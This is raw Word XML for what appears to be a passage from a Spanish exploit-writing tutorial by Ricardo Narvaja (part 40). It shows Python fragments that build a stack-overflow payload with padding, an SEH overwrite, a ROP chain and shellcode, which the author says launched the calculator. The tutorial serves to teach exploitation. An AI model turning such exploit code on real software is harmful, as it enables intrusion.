    <w:p w14:paraId="477214C0" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>raw_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>input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>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E92E742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rop= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>create_rop_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>chain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>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BEC330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highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>next=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\x41\x41\x41\x41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</w:p>
    <w:p w14:paraId="0552FE27" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>seh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>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>struct.pack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(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"&lt;L"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,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0x7802d415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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BECDF5B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highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data=(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0xec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) * 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"A"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+ rop + shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294180F3" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50FCAA6A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fruta = data </w:t>
      </w:r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>+  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(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844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-</w:t>
      </w:r>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>len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(data)) * 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"A"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)+ next + seh + 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 xml:space="preserve">6000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* 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"A"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 xml:space="preserve">+ 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\n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</w:p>
    <w:p w14:paraId="082290EF" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311ECDEF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print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stdin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CF0AA4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print </w:t>
      </w:r>
      <w:r w:rsidRPr="00633BD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"Escribe: " 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+ fruta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D7ED9F" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/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>stdin.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fruta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C3E7DE" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00633BD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print </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stdout.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="00633BD8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A31A45" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRPr="00633BD8" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A33B51D" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:r>
        <w:t>Vemos que use el mismo ROP que antes y le agregue el mismo shellcode para Mypepe y funciono.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB7F087" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA"/>
    <w:p w14:paraId="77934075" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="68915C9B" wp14:editId="2B9AA803">
            <wp:extent cx="5731200" cy="20828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CCB67" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA"/>
    <w:p w14:paraId="56B414D8" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:r>
        <w:t>Vemos que cuando llego al RET el ROP queda en el stack desde el inicio, para continuar ropeando y ejecutando el shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559087EC" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA"/>
    <w:p w14:paraId="24BB4054" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="672C3EAC" wp14:editId="276D468B">
            <wp:extent cx="4779327" cy="2564324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327" cy="2564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F96F4" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA"/>
    <w:p w14:paraId="0B6EF093" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:r>
        <w:t>Ahí ejecuto la calculadora.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0FFA64" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA"/>
    <w:p w14:paraId="120590A5" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:r>
        <w:t>Hasta la parte 40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8AB3E6" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:r>
        <w:t>Ricardo Narvaja</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362473F8" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F81BCD9" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F369CD0" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D2A9216" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35330426" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0132FB74" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE535DC" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434FEC8C" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C32A1F8" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C86DA" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4E386D" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A73F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FFA"/>
    <w:rsid w:val="00633BD8"/>
    <w:rsid w:val="00795E7E"/>
    <w:rsid w:val="00850EAC"/>
    <w:rsid w:val="00A73FFA"/>
    <w:rsid w:val="00C33816"/>
    <w:rsid w:val="00E67B1C"/>
    <w:rsid w:val="00F75CAD"/>
    <w:rsid w:val="00F8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C807"/>
  <w15:docId w15:val="{347D2820-8CAD-4533-BB88-68E0BEDF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s-A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5E7E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00795E7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E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E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E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E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E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E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E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95E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E7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B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BD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5E7E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5E7E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95E7E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E7E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95E7E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95E7E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E7E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E7E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E7E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5E7E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795E7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795E7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95E7E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00795E7E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="F79646" w:themeColor="accent6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00795E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5E7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95E7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E7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E7E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5E7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95E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5E7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95E7E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795E7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95E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95E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5E7E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795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narvaja</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-23T10:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-21T15:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>